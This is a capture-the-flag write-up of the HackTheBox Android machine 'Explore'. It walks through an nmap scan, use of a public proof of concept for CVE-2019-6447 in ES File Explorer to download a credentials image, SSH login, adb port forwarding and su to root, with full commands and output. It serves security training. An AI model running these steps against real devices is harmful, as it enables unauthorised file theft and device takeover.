Writeup for the easy ranked HTB box Explore

Posted on Oct 30, 2021


CVE-2019-6447 | “The ES File Explorer File Manager application through for Android allows remote attackers to read arbitrary files or execute applications via TCP port 59777 requests on the local Wi-Fi network. This TCP port remains open after the ES application has been launched once, and responds to unauthenticated application/json data over HTTP.”

If you have never tried hacking Android devices before, this could be a good first box. The credentials found for the user flag were very CTF-like, but I think the box was OK anyway. The tools used for this box were nmap, searchsploit, and adb. The environment I used was a Kali VM (in Parallels Desktop 17) on my macOS machine.

Let’s GO!


Port scanning with NMAP

Starting off with a standard nmap scan to find open ports (make sure to always save the output so you can go back to it later).

└─$ sudo nmap -T4 -Pn -p- -A explore.htb -o nmap.init
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-23 19:12 CEST
Nmap scan report for explore.htb (
Host is up (0.046s latency).
Not shown: 65530 closed ports
2222/tcp  open     ssh     (protocol 2.0)
| fingerprint-strings:
|   NULL:
|_    SSH-2.0-SSH Server - Banana Studio
| ssh-hostkey:
|_  2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)
5555/tcp  filtered freeciv
35367/tcp open     unknown
| fingerprint-strings:
|   GenericLines:
|     HTTP/1.0 400 Bad Request
|     Date: Thu, 23 Sep 2021 17:12:59 GMT
|     Content-Length: 22
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line:
|   GetRequest:
|     HTTP/1.1 412 Precondition Failed
|     Date: Thu, 23 Sep 2021 17:12:59 GMT
|     Content-Length: 0
|   HTTPOptions:
|     HTTP/1.0 501 Not Implemented
|     Date: Thu, 23 Sep 2021 17:13:04 GMT
|     Content-Length: 29
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Method not supported: OPTIONS
|   Help:
|     HTTP/1.0 400 Bad Request
|     Date: Thu, 23 Sep 2021 17:13:19 GMT
|     Content-Length: 26
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line: HELP
|   RTSPRequest:
|     HTTP/1.0 400 Bad Request
|     Date: Thu, 23 Sep 2021 17:13:04 GMT
|     Content-Length: 39
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     valid protocol version: RTSP/1.0
|   SSLSessionReq:
|     HTTP/1.0 400 Bad Request
|     Date: Thu, 23 Sep 2021 17:13:19 GMT
|     Content-Length: 73
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line:
|     ?G???,???`~?
|     ??{????w????<=?o?
|   TLSSessionReq:
|     HTTP/1.0 400 Bad Request
|     Date: Thu, 23 Sep 2021 17:13:19 GMT
|     Content-Length: 71
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line:
|     ??random1random2random3random4
|   TerminalServerCookie:
|     HTTP/1.0 400 Bad Request
|     Date: Thu, 23 Sep 2021 17:13:19 GMT
|     Content-Length: 54
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line:
|_    Cookie: mstshash=nmap
42135/tcp open     http    ES File Explorer Name Response httpd
|_http-title: Site doesn't have a title (text/html).
59777/tcp open     http    Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
|_http-title: Site doesn't have a title (text/plain).
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:

Network Distance: 2 hops
Service Info: Device: phone

TRACEROUTE (using port 993/tcp)
1   50.53 ms
2   50.69 ms explore.htb (

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 134.42 seconds


The open ports for this machine are:

  • 2222 - ssh
  • 5555 - freeciv (Civilization game? I later found out it is an “Android Debug Bridge” port)
  • 35367 - ???
  • 42135 - ES File Explorer
  • 59777 - Minecraft server? (I later found out that this is an ES File Explorer port that Android uses)

At first I thought (as nmap said) that it was a server for Minecraft and freeciv, so I started off looking for CVEs for those… but later on I discovered that these were ports used for Android communication (the box is also labeled ‘Android’, so I should have noticed that earlier..). Let’s take a closer look at ‘ES File Explorer’ to see if there are any exploits available.
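As an added example (not part of the original writeup), here is a small Python script that reads the saved nmap output and annotates the ports that nmap mislabels on an Android device, so the freeciv/Minecraft detour above is caught on the first read-through. The sample block is constructed to match the scan shown above; the port-to-note mapping is my own.

```python
import re

# Constructed sample in the shape of the saved nmap output above (not the
# real nmap.init file); the last column is what nmap guessed.
SAMPLE_NMAP = """\
2222/tcp  open     ssh     (protocol 2.0)
5555/tcp  filtered freeciv
35367/tcp open     unknown
42135/tcp open     http    ES File Explorer Name Response httpd
59777/tcp open     http    Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
Service Info: Device: phone
"""

# "<port>/<proto> <state> <service> <version...>"; script lines ("|", "|_") don't match.
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")

# Ports whose default nmap service name hides what they really are on Android.
ANDROID_PORT_HINTS = {
    5555: "Android Debug Bridge (adb), not freeciv",
    42135: "ES File Explorer HTTP service",
    59777: "ES File Explorer HTTP service, not a Minecraft JSONAPI; "
           "unauthenticated JSON over HTTP here is CVE-2019-6447",
}


def parse_nmap_ports(text):
    """Turn the port table of nmap normal output into a list of dicts."""
    ports = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            ports.append({"port": int(m.group(1)), "proto": m.group(2),
                          "state": m.group(3), "service": m.group(4),
                          "version": m.group(5).strip()})
    return ports


def android_findings(text):
    """Map each port that deserves a second look to its state and a note."""
    findings = {}
    for p in parse_nmap_ports(text):
        note = ANDROID_PORT_HINTS.get(p["port"])
        if note is None and "ES File Explorer" in p["version"]:
            note = "ES File Explorer HTTP service"   # app on a non-default port
        if note:
            findings[p["port"]] = {"state": p["state"], "note": note}
    return findings


def looks_like_phone(text):
    """nmap's own 'Service Info: Device: phone' line is the hint I missed."""
    return "Device: phone" in text


if __name__ == "__main__":
    print("phone:", looks_like_phone(SAMPLE_NMAP))
    for port, info in sorted(android_findings(SAMPLE_NMAP).items()):
        print(f"{port}/{info['state']}: {info['note']}")
```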

└─$ searchsploit "ES File Explorer"
---------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                              |  Path
---------------------------------------------------------------------------------------------------------------------------- ---------------------------------
ES File Explorer - Arbitrary File Read                                                                            | android/remote/50070.py
iOS iFileExplorer Free - Directory Traversal                                                                                | ios/remote/16278.py
MetaProducts Offline Explorer 1.x - FileSystem Disclosure                                                                   | windows/remote/20488.txt
Microsoft Internet Explorer / MSN - ICC Profiles Crash (PoC)                                                                | windows/dos/1110.txt
Microsoft Internet Explorer 4.x/5 / Outlook 2000 0/98 0/Express 4.x - ActiveX '.CAB' File Execution                         | windows/remote/19603.txt
Microsoft Internet Explorer 4/5 - DHTML Edit ActiveX Control File Stealing / Cross Frame Access                             | windows/remote/19094.txt
Microsoft Internet Explorer 5 - ActiveX Object For Constructing Type Libraries For Scriptlets File Write                    | windows/remote/19468.txt
Microsoft Internet Explorer 5 / Firefox 0.8 / OmniWeb 4.x - URI Protocol Handler Arbitrary File Creation/Modification       | windows/remote/24116.txt
Microsoft Internet Explorer 5/6 - 'file://' Request Zone Bypass                                                             | windows/remote/22575.txt
Microsoft Internet Explorer 6 - '%USERPROFILE%' File Execution                                                              | windows/remote/22734.html
Microsoft Internet Explorer 6 - Local File Access                                                                           | windows/remote/29619.html
Microsoft Internet Explorer 7 - Arbitrary File Rewrite (MS07-027)                                                           | windows/remote/3892.html
My File Explorer 1.3.1 iOS - Multiple Web Vulnerabilities                                                                   | ios/webapps/28975.txt
WebFileExplorer 3.6 - 'user' / 'pass' SQL Injection                                                                         | php/webapps/35851.txt
---------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

From here there was only one exploit that looked interesting: “ES File Explorer - Arbitrary File Read (CVE-2019-6447)”. Arbitrary File Read is a common vulnerability class that lets an attacker read files on the system.


This PoC is straightforward. I tried some commands, but the interesting one here was ‘listPics’, which showed a photo called ‘creds.jpg’.

#python3 50070.py <command> <IP> [file to download]

# Available Commands #

#listFiles: List all the files
#listPics: List all the pictures
#listVideos: List all the videos
#listAudios: List all the audio files
#listApps: List all the apps installed
#listAppsSystem: List all the system apps
#listAppsPhone: List all the phone apps
#listAppsSdcard: List all the apk files in the sdcard
#listAppsAll: List all the apps installed (system apps included)
#getDeviceInfo: Get device info
#appPull: Pull an app from the device. Package name parameter is needed
#appLaunch: Launch an app. Package name parameter is needed
#getAppThumbnail: Get the icon of an app. Package name parameter is needed

└─$ python3 50070.py listPics explore.htb

|    ES File Explorer Open Port Vulnerability : CVE-2019-6447    |
|                Coded By : Nehal a.k.a PwnerSec                 |

name : concept.jpg
time : 4/21/21 02:38:08 AM
location : /storage/emulated/0/DCIM/concept.jpg
size : 135.33 KB (138,573 Bytes)

name : anc.png
time : 4/21/21 02:37:50 AM
location : /storage/emulated/0/DCIM/anc.png
size : 6.24 KB (6,392 Bytes)

name : creds.jpg
time : 4/21/21 02:38:18 AM
location : /storage/emulated/0/DCIM/creds.jpg
size : 1.14 MB (1,200,401 Bytes)

name : 224_anc.png
time : 4/21/21 02:37:21 AM
location : /storage/emulated/0/DCIM/224_anc.png
size : 124.88 KB (127,876 Bytes)

└─$ sudo python3 50070.py getFile explore.htb /storage/emulated/0/DCIM/creds.jpg
|    ES File Explorer Open Port Vulnerability : CVE-2019-6447    |
|                Coded By : Nehal a.k.a PwnerSec                 |

[+] Downloading file...
[+] Done. Saved as `out.dat`.

Open the downloaded file (saved as ‘out.dat’, which is ‘creds.jpg’) and we find credentials for the user kristi (yeah, very CTF-like).

So now we have access via SSH, and on an HTB easy box that usually means we have the user flag as well.

└─$ ssh kristi@explore.htb -p 2222
The authenticity of host '[explore.htb]:2222 ([]:2222)' can't be established.
RSA key fingerprint is SHA256:3mNL574rJyHCOGm1e7Upx4NHXMg/YnJJzq+jXhdQQxI.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Failed to add the host to the list of known hosts (/home/erra/.ssh/known_hosts).
Password authentication
:/ $ whoami
:/ $
:/ $ ls
acct                   init.superuser.rc       sbin
bin                    init.usb.configfs.rc    sdcard
bugreports             init.usb.rc             sepolicy
cache                  init.zygote32.rc        storage
charger                init.zygote64_32.rc     sys
config                 lib                     system
d                      mnt                     ueventd.android_x86_64.rc
data                   odm                     ueventd.rc
default.prop           oem                     vendor
dev                    plat_file_contexts      vendor_file_contexts
etc                    plat_hwservice_contexts vendor_hwservice_contexts
fstab.android_x86_64   plat_property_contexts  vendor_property_contexts
init                   plat_seapp_contexts     vendor_seapp_contexts
init.android_x86_64.rc plat_service_contexts   vendor_service_contexts
init.environ.rc        proc                    vndservice_contexts
init.rc                product
:/ $ ls sdcard/
Alarms  DCIM     Movies Notifications Podcasts  backups   user.txt
Android Download Music  Pictures      Ringtones dianxinos
:/ $ cat sdcard/user.txt
:/ $

I started off by enumerating folders and trying various commands but found nothing, so from here I was pretty lost. I started to google around, and since we had a user account I searched for something like “android shell privilege escalation” and after a while found this Android pentesting guide. First, we need to install adb (Android Debug Bridge), which is a command-line tool for communicating with Android devices. The documentation says: “The adb command facilitates a variety of device actions, such as installing and debugging apps, and it provides access to a Unix shell that you can use to run a variety of commands on a device”. Sounds like exactly what I need!

After installing adb I tried to just connect to the device, but it didn’t seem to work:

└─$ adb connect
# No output

Scrolling down in the pentest guide, I found out how to port-forward via SSH (just add the -L switch with the correct parameters) and then connect via adb.

Privilege escalation

# Connect ssh on port 2222 with a port-forward of 5555 via my VM
└─$ ssh kristi@explore.htb -p 2222 -L 5555:
# Connect adb to port 5555
└─$ adb connect
connected to
# Connect to the shell
└─$ adb shell
x86_64:/ $ whoami
x86_64:/ $
x86_64:/ $ id
uid=2000(shell) gid=2000(shell) groups=2000(shell),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc),3011(uhid) context=u:r:shell:s0
x86_64:/ $ cd data
x86_64:/data $ ls
ls: .: Permission denied
1|x86_64:/data $ su
:/ # whoami
:/ # cat data/root.txt

And boom, simple as that, we have shell access, and after some trial and error I just typed su and escalated to root!


This box was my first Android box, so from time to time I was pretty lost. But I learned about the adb tool, which was new for me, and hopefully I can make use of it somehow later in my career.

Happy hacking!

/Eric (cyberrauken)